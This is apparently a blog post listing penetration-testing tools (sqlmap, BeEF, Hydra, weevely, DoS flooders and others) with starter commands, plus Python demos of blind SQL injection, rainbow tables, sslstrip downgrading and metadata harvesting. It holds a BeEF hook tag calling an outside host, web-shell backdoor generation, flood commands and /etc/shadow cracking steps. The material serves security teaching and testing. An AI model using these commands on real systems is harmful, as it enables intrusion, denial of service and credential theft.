DEV Community

Alpha Olomi
Tools for Penetration Testing

Over time I compiled this list of tools used in penetration testing and ethical hacking, with the basic commands needed to get started with each.

Database Tools Usage

  1. sqlmap

Automates detecting and exploiting SQL injection flaws, up to taking over the database server.

```bash
# basic scan of one URL
sqlmap -u victim_url

# authenticated scan of DVWA's blind SQLi page, testing only the id parameter
# (the PHPSESSID must be a live session cookie copied from your browser)
sqlmap --headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0" \
  --cookie="security=low; PHPSESSID=oikbs8qcic2omf5gnd09kihsm7" \
  -u 'http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#' \
  --level=5 --risk=3 -p id --suffix="-BR" -v 3
```
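What sqlmap's boolean-based blind technique does under the hood, as an added example (Python; not code from the original post or from sqlmap): a deliberately vulnerable SQLite lookup, the same query with a bound parameter, and an oracle that confirms the injection with a true/false pair and then reads a column out one character at a time. The users table, its rows and the `lookup_*` function names are constructed for the demo.

```python
"""Boolean-based blind SQL injection against an in-memory SQLite app (added demo)."""
import sqlite3

# Constructed demo database: a tiny users table.
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT);
INSERT INTO users VALUES (1, 'admin', 's3cret');
INSERT INTO users VALUES (2, 'guest', 'guest');
""")


def lookup_vulnerable(user_id: str) -> bool:
    """Vulnerable: user_id is spliced into the statement. Returns True when a
    row came back, which is the only signal a 'blind' page leaks."""
    row = conn.execute(f"SELECT name FROM users WHERE id = {user_id}").fetchone()
    return row is not None


def lookup_safe(user_id: str) -> bool:
    """Fixed: the value is validated and bound, so it can only ever be a value."""
    try:
        uid = int(user_id)
    except ValueError:
        return False
    row = conn.execute("SELECT name FROM users WHERE id = ?", (uid,)).fetchone()
    return row is not None


def is_blind_injectable(lookup) -> bool:
    """Inject a tautology and a contradiction: a vulnerable endpoint answers
    them differently, a parameterised one rejects both."""
    return lookup("1 AND 1=1") and not lookup("1 AND 1=2")


def extract_string(lookup, column: str, row_id: int, max_len: int = 32) -> str:
    """Read `column` of row `row_id` one character at a time, binary-searching
    the ASCII value with the yes/no oracle (about 7 requests per character)."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            payload = (f"{row_id} AND length({column}) >= {pos} "
                       f"AND unicode(substr({column}, {pos}, 1)) > {mid}")
            if lookup(payload):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:          # no character at this position: end of string
            break
        out += chr(lo)
    return out
```

Against a real target each `lookup` call is an HTTP request and the true/false signal is a difference in the page; sqlmap's `--technique=B` automates exactly this search, which is why a blind injection takes hundreds of requests rather than one.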

CMS Scanning Tools

  1. WPScan

WordPress vulnerability scanner.

```bash
wpscan --version
wpscan --url http://victim_url/
```

  2. Joomscan

Joomla vulnerability scanner.

```bash
joomscan -h
joomscan --version
joomscan -u victim_url
```

SSL Scanning Tools

  1. TLSSLed

Checks a TLS service for weak ciphers, old protocol versions and certificate problems.

```bash
tlssled URL port
# e.g. tlssled example.com 443
```

  2. w3af

Web Application Attack and Audit Framework: a general web-application scanner (TLS checks are only one of its audit plugins).

  • start it

```bash
w3af
```

  • enter the URL of the target
  • start the scan

Exploitation Tools

  1. Metasploit

```bash
msfupdate
# inside msfconsole:
msf > search name:Microsoft type:exploit
```

  2. Armitage

GUI front end for Metasploit.

  3. BeEF

Browser Exploitation Framework: hooks a victim's browser through a JavaScript file and controls it from a web UI.

```bash
beef-xss
```

Default username and password: beef / beef (change them in BeEF's config.yaml before exposing the UI).

Hook a browser by getting this tag into a page it loads (for example through an XSS flaw):

```html
<script src="http://192.168.1.101:3000/hook.js" type="text/javascript"></script>
```

  4. Linux Exploit Suggester

Lists known kernel exploits for a given kernel version.

```bash
cd /usr/share/linux-exploit-suggester
./Linux_Exploit_Suggester.pl -k 3.0.0   # -k: kernel version to check
```

Forensics Tools

  1. p0f

Identifies the operating system of a target host purely by examining captured packets: it sends nothing, so the target never sees a scan. In the hands of advanced users p0f can also detect firewall presence, NAT and load balancers.

```bash
p0f --version
p0f -h
p0f -i eth0 -p -o filename   # -i interface to listen on, -p promiscuous mode, -o log file
```

  • then generate traffic across that interface, e.g. open http://192.168.1.2 in a browser, and p0f reports a fingerprint for each host it sees
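A miniature version of what p0f does with the SYN packets it captures, as an added example (Python; not p0f's code or its signature database): parse the IPv4 and TCP headers, pull out the fields p0f keys on (initial TTL, window size, MSS, window scaling, option order) and match them against a small illustrative signature table. The two packets and the two signatures are constructed for the demo; real p0f signatures are far richer.

```python
"""Passive OS fingerprinting from a captured TCP SYN, p0f-style (added demo)."""
import struct


def parse_tcp_options(raw: bytes) -> dict:
    """Walk the TCP options block, recording MSS, window scale and option order."""
    opts = {"mss": None, "wscale": None, "order": []}
    i = 0
    while i < len(raw):
        kind = raw[i]
        if kind == 0:                       # end of option list
            break
        if kind == 1:                       # NOP padding
            opts["order"].append("nop")
            i += 1
            continue
        length = raw[i + 1]
        body = raw[i + 2:i + length]
        if kind == 2:
            opts["mss"] = struct.unpack("!H", body)[0]
            opts["order"].append("mss")
        elif kind == 3:
            opts["wscale"] = body[0]
            opts["order"].append("ws")
        elif kind == 4:
            opts["order"].append("sok")      # SACK permitted
        elif kind == 8:
            opts["order"].append("ts")       # timestamps
        else:
            opts["order"].append(f"?{kind}")
        i += length
    return opts


def fingerprint(packet: bytes) -> dict:
    """Extract the fields a passive fingerprinter keys on from raw IPv4+TCP bytes."""
    ver_ihl, _, _, _, _, ttl, _, _, _, _ = struct.unpack("!BBHHHBBH4s4s", packet[:20])
    tcp = packet[(ver_ihl & 0x0F) * 4:]
    _, _, _, _, offset, flags, window, _, _ = struct.unpack("!HHIIBBHHH", tcp[:20])
    opts = parse_tcp_options(tcp[20:(offset >> 4) * 4])
    # The observed TTL is decremented per hop; round up to the nearest common start value.
    initial_ttl = next(t for t in (32, 64, 128, 255) if ttl <= t)
    return {"ttl": initial_ttl, "hops": initial_ttl - ttl, "window": window,
            "mss": opts["mss"], "wscale": opts["wscale"], "order": opts["order"],
            "syn": bool(flags & 0x02) and not (flags & 0x10)}


# Illustrative signatures: (label, initial TTL, window rule, option order).
SIGNATURES = [
    ("Linux 3.x+", 64, lambda win, mss: mss is not None and win == 10 * mss,
     ["mss", "sok", "ts", "nop", "ws"]),
    ("Windows 7+", 128, lambda win, mss: win == 8192,
     ["mss", "nop", "ws", "nop", "nop", "sok"]),
]


def guess_os(packet: bytes) -> str:
    fp = fingerprint(packet)
    if not fp["syn"]:
        return "not a SYN"
    for label, ttl, window_rule, order in SIGNATURES:
        if fp["ttl"] == ttl and window_rule(fp["window"], fp["mss"]) and fp["order"] == order:
            return label
    return "unknown"


def build_syn(ttl: int, window: int, options: bytes) -> bytes:
    """Construct a minimal IPv4+TCP SYN for the demo (checksums left zero)."""
    options += b"\x00" * (-len(options) % 4)
    tcp_len = 20 + len(options)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + tcp_len, 0x1234, 0x4000, ttl, 6, 0,
                     bytes([10, 0, 0, 5]), bytes([10, 0, 0, 1]))
    tcp = struct.pack("!HHIIBBHHH", 40000, 80, 1, 0, (tcp_len // 4) << 4, 0x02, window, 0, 0)
    return ip + tcp + options


# Constructed captures: a Linux host and a Windows host, each three hops away.
LINUX_SYN = build_syn(61, 14600,
    b"\x02\x04\x05\xb4" + b"\x04\x02" + b"\x08\x0a" + b"\x00" * 8 + b"\x01" + b"\x03\x03\x07")
WINDOWS_SYN = build_syn(125, 8192,
    b"\x02\x04\x05\xb4" + b"\x01" + b"\x03\x03\x08" + b"\x01\x01" + b"\x04\x02")
```

The hop count comes for free from the TTL rounding, which is how p0f spots NAT and load balancers: several fingerprints, or inconsistent hop counts, behind one source address.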
  2. pdf-parser

Parses a PDF document to identify the fundamental elements (objects, streams, references) used in it.

```bash
pdf-parser -o 10 filepath   # -o 10: show only object number 10
```
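What you are looking for when you walk a suspicious file with pdf-parser object by object, as an added example (Python; not pdf-parser's own code): a minimal parser for the `N G obj ... endobj` layout that lists each object's type, names and references and flags the hooks a malware analyst checks first (/OpenAction, /AA, /JS, /JavaScript, /Launch, /EmbeddedFile). Streams and filters are ignored, so a sample that hides its payload in a compressed stream still needs pdf-parser's -f/-w handling. The PDF bytes are constructed here.

```python
"""Triage a PDF's objects for auto-execute and script hooks (added demo)."""
import re

SUSPICIOUS = {"/OpenAction", "/AA", "/JS", "/JavaScript", "/Launch", "/EmbeddedFile"}
OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj(.*?)endobj", re.S)
NAME_RE = re.compile(rb"/[A-Za-z0-9#_.-]+")
REF_RE = re.compile(rb"(\d+)\s+\d+\s+R\b")


def parse_objects(pdf: bytes) -> dict:
    """Return {object number: {'type': ..., 'names': [...], 'refs': [...]}}."""
    objects = {}
    for m in OBJ_RE.finditer(pdf):
        num, body = int(m.group(1)), m.group(3)
        names = [n.decode() for n in NAME_RE.findall(body)]
        refs = [int(r) for r in REF_RE.findall(body)]
        typ = next((names[i + 1] for i, n in enumerate(names[:-1]) if n == "/Type"), None)
        objects[num] = {"type": typ, "names": names, "refs": refs}
    return objects


def suspicious_objects(pdf: bytes) -> dict:
    """Map object number -> set of suspicious names found in that object."""
    hits = {}
    for num, obj in parse_objects(pdf).items():
        found = SUSPICIOUS & set(obj["names"])
        if found:
            hits[num] = found
    return hits


def open_action_target(pdf: bytes):
    """Object number that /OpenAction points at (it runs when the file is opened), or None."""
    for m in OBJ_RE.finditer(pdf):
        ref = re.search(rb"/OpenAction\s+(\d+)\s+\d+\s+R", m.group(3))
        if ref:
            return int(ref.group(1))
    return None


# Constructed sample: the catalog's /OpenAction fires a JavaScript action object.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R >> endobj
4 0 obj << /Type /Action /S /JavaScript /JS (app.alert('hi')) >> endobj
trailer << /Root 1 0 R >>
"""
```

Following the reference chain from the catalog to object 4 is the same walk pdf-parser's `-o` and `-r` options let you do by hand, one object at a time.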
  3. dumpzilla

Extracts all forensically interesting information (history, cookies, downloads, sessions, saved forms and passwords) from Firefox, Iceweasel and SeaMonkey browser profiles.

  4. ddrescue

Copies data from one file or block device (hard disk, CD-ROM, etc.) to another, rescuing the good parts first in case of read errors. The commands below are for dd_rescue; GNU ddrescue is a separate tool with the same goal but different options.

```bash
dd_rescue infilepath outfilepath
dd_rescue -v /dev/sdb ~/sec.img   # image a whole disk to a file, verbose
```

  5. DFF

Digital Forensics Framework; start the GUI with:

```bash
dff-gui
```

Social Engineering

  1. Social Engineering Toolkit

To let SET send phishing mail through a local mail server, install sendmail and switch it on in SET's config:

```bash
sudo apt install sendmail
vim config/set_config   # change SENDMAIL=OFF to SENDMAIL=ON
```

Stressing Tools

Tools for carrying out DoS attacks or stress-testing applications, so that appropriate countermeasures can be put in place.

  1. Slowhttptest

```bash
slowhttptest --version
slowhttptest -h
# sample: Slowloris-style slow-headers test
slowhttptest -c 500 -H -g -o outputfile -i 10 -r 200 -t GET -u http://192.168.1.202/index.php -x 24 -p 2
```

Where,
-c 500 = 500 connections
-H = Slowloris mode (send headers slowly, never finishing the request)
-g = generate statistics
-o outputfile = output file name
-i 10 = wait 10 seconds between follow-up data on each connection
-r 200 = open 200 connections per second
-t GET = use GET requests
-u http://192.168.1.202/index.php = target URL
-x 24 = maximum length of each follow-up data chunk, 24 bytes
-p 2 = give the probe connection 2 seconds to get a response before the server is counted as unreachable

  2. Inviteflood

SIP/SDP INVITE message flooding over UDP/IP.

```bash
inviteflood --version
# format
inviteflood eth0 target_extension target_domain target_ip number_of_packets
# sample
inviteflood eth0 2000 192.168.x.x 192.168.x.x 1
```

Where,
target_extension is 2000
target_domain is 192.168.x.x
target_ip is 192.168.x.x
number_of_packets is 1
-a (optional) sets the alias of the SIP account used in the flood

  3. Iaxflood

VoIP DoS tool that floods an IAX (Asterisk) peer.

```bash
iaxflood --version
iaxflood -h
# format
iaxflood ip_src ip_dest numpackets
```

  4. thc-ssl-dos

Tests how a server copes with the cost of SSL/TLS handshakes. According to the tool's authors, establishing a secure SSL connection requires about 15x more processing power on the server than on the client, and thc-ssl-dos multiplies that by repeatedly renegotiating over each connection; servers with client-initiated renegotiation disabled are largely unaffected.

```bash
# format
thc-ssl-dos victimIP httpsport --accept
# example
thc-ssl-dos 192.168.1.1 443 --accept
```

Sniffing & Spoofing

  1. Burpsuite

Intercepting proxy that sits between your browser and the web server so you can see and modify the parameters the web application uses.

  2. mitmproxy

SSL-capable man-in-the-middle HTTP proxy.

```bash
mitmproxy --version
mitmproxy -h
mitmproxy -p portnumber   # port to listen on (default 8080)
mitmproxy -p 80           # listening below 1024 needs root
```

  3. Wireshark

Graphical network protocol analyser for capturing and inspecting packets.

  4. sslstrip

MITM attack that forces a victim's browser to communicate in plain-text over HTTP: the victim's traffic is routed through sslstrip, which keeps the HTTPS leg to the server and rewrites https:// links in the pages it passes back. Browsers that already know the site's HSTS policy will not follow the downgraded links.

```bash
sslstrip --version
sslstrip -h
sslstrip -l 8080   # -l: port to listen on; redirect the victim's port-80 traffic here with iptables
```
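The two halves of the sslstrip story, as an added example (Python; not sslstrip's own code): the rewriting it performs on proxied responses, and the Strict-Transport-Security check a modern browser applies before it will follow the rewritten link, which is why the attack fails against sites the browser has already seen over HTTPS. The sample page, cookie and header values are constructed for the demo.

```python
"""sslstrip-style downgrade of a proxied response, and the HSTS check that defeats it (added demo)."""
import re
from urllib.parse import urlsplit


def downgrade_html(html: str) -> str:
    """What sslstrip does to every page it relays: https:// becomes http://,
    so the victim's next click goes out in plaintext through the attacker."""
    return re.sub(r"https://", "http://", html, flags=re.IGNORECASE)


def downgrade_set_cookie(header: str) -> str:
    """Drop the Secure attribute so the session cookie is also sent over HTTP."""
    return "; ".join(a for a in header.split("; ") if a.strip().lower() != "secure")


def parse_hsts(value: str) -> dict:
    """Parse a Strict-Transport-Security header value."""
    policy = {"max_age": 0, "include_subdomains": False}
    for directive in value.split(";"):
        name, _, val = directive.strip().partition("=")
        name, val = name.strip().lower(), val.strip().strip('"')
        if name == "max-age" and val.isdigit():
            policy["max_age"] = int(val)
        elif name == "includesubdomains":
            policy["include_subdomains"] = True
    return policy


def request_goes_plaintext(url: str, known_hsts: dict) -> bool:
    """True if a browser holding `known_hsts` (host -> policy learned on an
    earlier HTTPS visit) would actually emit this request over plain HTTP.
    An HSTS-covered host is upgraded inside the browser, so sslstrip never sees it."""
    parts = urlsplit(url)
    if parts.scheme.lower() != "http":
        return False
    host = (parts.hostname or "").lower()
    for h, policy in known_hsts.items():
        if policy["max_age"] <= 0:
            continue                    # max-age=0 deletes the policy
        if host == h or (policy["include_subdomains"] and host.endswith("." + h)):
            return False
    return True
```

HSTS is trust-on-first-use: a victim who has never visited the site over HTTPS, and whose browser has no preload entry for it, is still downgradable, which is exactly the window sslstrip was built for.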

Password Cracking Tools

  1. Hydra

Login cracker that supports many protocols.

```bash
# -L/-P take a file of usernames/passwords (lower-case -l/-p take a single value); -V shows every attempt
hydra -L /usr/share/wordlists/metasploit/user -P /usr/share/wordlists/metasploit/passwords ftp://192.168.1.101 -V
```

  2. Johnny

GUI for the John the Ripper password cracking tool.

  3. John

John the Ripper itself: the command-line cracker behind the Johnny GUI. Merge /etc/passwd and /etc/shadow first so john sees each username next to its hash, then point john at the result:

```bash
unshadow passwd shadow > unshadowed.txt
```

  4. Rainbowcrack

Cracks hashes by rainbow-table lookup instead of brute force; it needs tables generated for the right hash type, charset and length.

```bash
rcrack -h
# format
rcrack path_to_rainbow_tables -f path_to_password_hash
# one hash, using the tables in the current directory
./rcrack . -h 5d41402abc4b2a76b9719d911017c592
# a file of hashes, one per line
./rcrack . -l hash.txt
```
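The mechanics rcrack relies on, as an added example (Python; not RainbowCrack's code): a hash function, a family of position-dependent reduction functions, chains of which only the start and end points are kept, a lookup that regenerates a chain on demand, and a coverage check that shows why merging chains leave holes. Parameters are tiny (MD5 over 4-digit PINs) so it runs in well under a second; the real tool works the same way over files of sorted chains for far larger keyspaces. The constants and function names are this example's own.

```python
"""A miniature rainbow table for MD5 over 4-digit PINs (added demo)."""
import hashlib

CHARSET = "0123456789"
PLEN = 4                       # PIN length
SPACE = len(CHARSET) ** PLEN   # 10,000 candidate PINs
CHAIN_LEN = 100                # hash/reduce steps per chain
N_CHAINS = 600                 # rows stored as (end point -> start points)


def md5_hex(pw: str) -> str:
    return hashlib.md5(pw.encode()).hexdigest()


def index_to_pw(i: int) -> str:
    """Map an integer in [0, SPACE) to a PIN."""
    out = ""
    for _ in range(PLEN):
        out = CHARSET[i % len(CHARSET)] + out
        i //= len(CHARSET)
    return out


def reduce_fn(digest: str, position: int) -> str:
    """Turn a digest back into a candidate PIN. Mixing in the chain position is
    what makes this a rainbow table rather than a plain Hellman table: two
    chains that collide at different positions no longer merge."""
    return index_to_pw((int(digest[:12], 16) + position) % SPACE)


def build_table() -> dict:
    """Precompute N_CHAINS chains, keeping only their start and end points."""
    table = {}
    for c in range(N_CHAINS):
        start = index_to_pw((c * 7919) % SPACE)   # 7919 is prime: spreads the starts
        pw = start
        for pos in range(CHAIN_LEN):
            pw = reduce_fn(md5_hex(pw), pos)
        table.setdefault(pw, []).append(start)    # several chains may share an end
    return table


def crack(table: dict, target: str):
    """Return a PIN whose MD5 is `target`, or None if no stored chain covers it."""
    for k in range(CHAIN_LEN - 1, -1, -1):
        # Hypothesis: target is the k-th digest of some chain. Finish that chain.
        d = target
        for pos in range(k, CHAIN_LEN):
            pw = reduce_fn(d, pos)
            if pos < CHAIN_LEN - 1:
                d = md5_hex(pw)
        # Any chain ending here is regenerated and checked (false alarms happen).
        for start in table.get(pw, []):
            p = start
            for pos in range(CHAIN_LEN):
                if md5_hex(p) == target:
                    return p
                p = reduce_fn(md5_hex(p), pos)
    return None


def coverage(table: dict) -> float:
    """Fraction of the keyspace reachable from the stored chains; merges keep it below 1."""
    seen = set()
    for starts in table.values():
        for start in starts:
            p = start
            for pos in range(CHAIN_LEN):
                seen.add(p)
                p = reduce_fn(md5_hex(p), pos)
    return len(seen) / SPACE


TABLE = build_table()
```

The table stores 600 rows to cover most of 10,000 PINs, and the lookup costs at most CHAIN_LEN regenerations: that time/memory trade-off is the whole point, and it is also why a per-user salt (which multiplies the keyspace by the number of salts) makes rainbow tables useless against properly stored passwords.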
  5. SQLdict

Dictionary attack tool for Microsoft SQL Server logins (Windows GUI).

```bash
sqldict
```

  • Under "Target IP Server", enter the server's address.
  • Under "Target Account", enter the username.
  • Load the file with the password list.
  • Start.

  6. hash-identifier

Identifies the likely type of a hash from its length and character set. The guess is heuristic: MD5, NTLM and MD4 all look like 32 hex characters, so confirm with the context the hash came from.

```bash
hash-identifier 5d41402abc4b2a76b9719d911017c592
```

Maintaining Access

Tools used to keep a connection to, and access on, a compromised machine even after it disconnects and reconnects.

  1. Powersploit

PowerShell post-exploitation modules for working on a compromised Windows machine; Kali ships them under the directory below, ready to be served to the target.

```bash
cd /usr/share/powersploit/
```

  2. Sbd

Similar to Netcat, with AES-CBC-128 + HMAC-SHA1 encryption of the channel. Give both ends the same shared secret with -k rather than relying on the built-in default key.

```bash
# server
sbd -l -p 44
# victim
sbd 192.168.43.2 44
```

  3. Weevely

PHP web shell that simulates a telnet-like connection, used as a stealth backdoor. Generate the agent, upload it to the web server, then connect to it with the same password.

```bash
# check
weevely -h
# format
weevely generate password pathoffile
# sample
weevely generate adm1n123 ~/Desktop/about1.php
# format (the URL must point at the uploaded agent file)
weevely URL password
# sample
weevely http://198.168.32.13 adm1n123
```

  4. http-tunnel

Creates a bidirectional virtual data stream tunnelled in HTTP requests; useful for users behind restrictive firewalls.

```bash
# server
httptunnel_server -h
# client
httptunnel_client -h
```

  5. cryptcat

Similar to Netcat, making TCP and UDP connections to a victim's machine in an encrypted way. Set your own key with -k on both sides; the compiled-in default key is public knowledge.

```bash
# server
cryptcat -l -p port -n
# client
cryptcat IPofServer PortofServer
```

Reverse Engineering

  1. OllyDbg

32-bit assembler-level analysing debugger for Microsoft Windows applications; widely used for analysing and patching compiled Windows binaries (on Linux it runs under Wine).

  • start

```bash
ollydbg
```

  2. dex2jar

Converts Dalvik bytecode (a .dex file, such as the classes.dex inside an APK) to a JAR so the code can be read with a Java decompiler.

```bash
# -d keeps debug info in the output
d2j-dex2jar -d /file/location
d2j-dex2jar -d ~/Desktop/class.dex
```

  3. jd-gui

Standalone graphical utility that displays the Java source of .class files; open the JAR produced by dex2jar in it.

```bash
jd-gui
```

  4. apktool

One of the best tools for reversing a whole Android application: it decodes the resources and disassembles the dex code to smali, and can rebuild the APK afterwards.

```bash
apktool
# decompile
apktool d app.apk
```

Reporting Tools

  1. Dradis

Collaboration and reporting platform; start the service, then open the web UI.

```bash
service dradis start
dradis
```

  2. Metagoofil

Searches Google for documents published by a target domain, downloads them to local disk and extracts their metadata (authors, usernames, software versions, paths).

```bash
# help
metagoofil -h
metagoofil -d udsm -t docx -l 3 -o ~/Downloads -f ~/Downloads/metagoofil_res
```

  • -d (domain name)
  • -t (file types to download: docx, pdf, etc.)
  • -l (limit the search results, e.g. 10, 100)
  • -n (limit the number of files to download)
  • -o (directory to save the files in)
  • -f (output report file)
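The extraction step metagoofil performs once the documents are on disk, as an added example (Python; not metagoofil's code): an Office document is a zip whose docProps/core.xml and docProps/app.xml carry the creator, last editor, company and application version, which is where the usernames and software versions for a later attack come from. The .docx is built in memory here and its contents are constructed; `extract_docx_metadata` works on a real file's bytes the same way.

```python
"""Harvest author and software metadata from an Office document, as metagoofil does (added demo)."""
import io
import zipfile
import xml.etree.ElementTree as ET

NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
    "ep": "http://schemas.openxmlformats.org/officeDocument/2006/extended-properties",
}
# (XML element, key in the result dict) for each of the two property parts.
CORE_FIELDS = (("dc:title", "title"), ("dc:creator", "creator"), ("cp:lastModifiedBy", "last_modified_by"))
APP_FIELDS = (("ep:Application", "application"), ("ep:AppVersion", "app_version"), ("ep:Company", "company"))


def extract_docx_metadata(data: bytes) -> dict:
    """Return the people/software fields from a .docx/.xlsx/.pptx given as bytes."""
    meta = {}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        parts = set(z.namelist())
        for part, fields in (("docProps/core.xml", CORE_FIELDS), ("docProps/app.xml", APP_FIELDS)):
            if part not in parts:
                continue
            root = ET.fromstring(z.read(part))
            for tag, key in fields:
                el = root.find(tag, NS)
                if el is not None and el.text:
                    meta[key] = el.text.strip()
    return meta


def harvest_usernames(meta: dict) -> set:
    """The fields that usually hold a logon name or e-mail local part."""
    return {meta[k] for k in ("creator", "last_modified_by") if k in meta}


def build_sample_docx() -> bytes:
    """Constructed document with the parts a real Word file carries."""
    core = (f'<?xml version="1.0" encoding="UTF-8"?>'
            f'<cp:coreProperties xmlns:cp="{NS["cp"]}" xmlns:dc="{NS["dc"]}">'
            f'<dc:title>Q3 budget</dc:title><dc:creator>j.doe</dc:creator>'
            f'<cp:lastModifiedBy>a.smith</cp:lastModifiedBy></cp:coreProperties>')
    app = (f'<?xml version="1.0" encoding="UTF-8"?>'
           f'<Properties xmlns="{NS["ep"]}"><Application>Microsoft Office Word</Application>'
           f'<AppVersion>16.0000</AppVersion><Company>Example Corp</Company></Properties>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<document/>")
        z.writestr("docProps/core.xml", core)
        z.writestr("docProps/app.xml", app)
    return buf.getvalue()
```

Run over a directory of downloaded files this yields the username format of the organisation (here `first.last`) and the Office build in use, which is the real value of the tool; stripping document properties before publishing is the defence.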

Misc

  1. strace

```bash
# sample: trace only the network, read and write system calls of an application
strace -e trace=network,read,write /path/to/app args
# example
strace -e trace=network,read,write customapp
```
